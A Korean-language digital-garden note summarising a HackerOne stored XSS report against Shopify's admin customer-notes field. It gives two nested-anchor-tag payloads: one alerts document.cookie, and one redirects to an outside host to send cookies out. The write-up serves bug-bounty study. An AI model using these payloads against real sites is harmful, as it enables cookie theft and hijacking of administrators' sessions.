hackerone-shopify-2020-04-n-798599

xss stored

고객 메모 기능에 stored XSS가 가능했다.

<<내 상점>>.myshopify.com/admin/customers/<<고객 ID>> 에 접속하여 메모에 XSS 페이로드를 넣었다. 이는 <<내 상점>>.myshopify.com/admin/customers 페이지와 <<내 상점>>.myshopify.com/admin/customers/<<고객 ID>> 페이지에서 트리거되었다.

다음은 단순히 alert로 쿠키를 띄우는 페이로드이다.

<h1>holaaaaaaa||<a href="http://<a href="http://<a href="http://<a href="javascript:alert(document.cookie)" onmouseover="javascript:alert(document.cookie)">aaaaaaaaaaaaaaaaaaaaaaaaaagle.com</a>">aaaaaaaaaaaaaaaaaaaaaaaaaagle.com</a>">aaaaaaaaaaaaaaaaaaaaaaaaaagle.com</a>">gle.com</a> hhh

다음은 쿠키를 외부로 보내는 페이로드이다.

<h1>holaaaaaaa||<a href="http://<a href="http://<a href="http://<a href="javascript:window.location='https://growncheckerworl.com/cookie.php?cookie=document.cookie'" >aaaaaaaaaaaaaaaaaaaaaaaaaagle.com</a>">aaaaaaaaaaaaaaaaaaaaaaaaaagle.com</a>">aaaaaaaaaaaaaaaaaaaaaaaaaagle.com</a>">gle.com</a> hhhk

a 태그를 중첩하여 사용했다는 특이사항이 있다. 링크나 a 태그를 처리하는 로직에 오류가 있었던 듯 하다.

tags: bughunting, shopify, xss, stored-xss, wstg-inpv-02, severity none, web hacking

Digital garden

Explorer

hackerone-shopify-2020-04-n-798599

hackerone-shopify-2020-04-n-798599

xss stored

Graph View

Table of Contents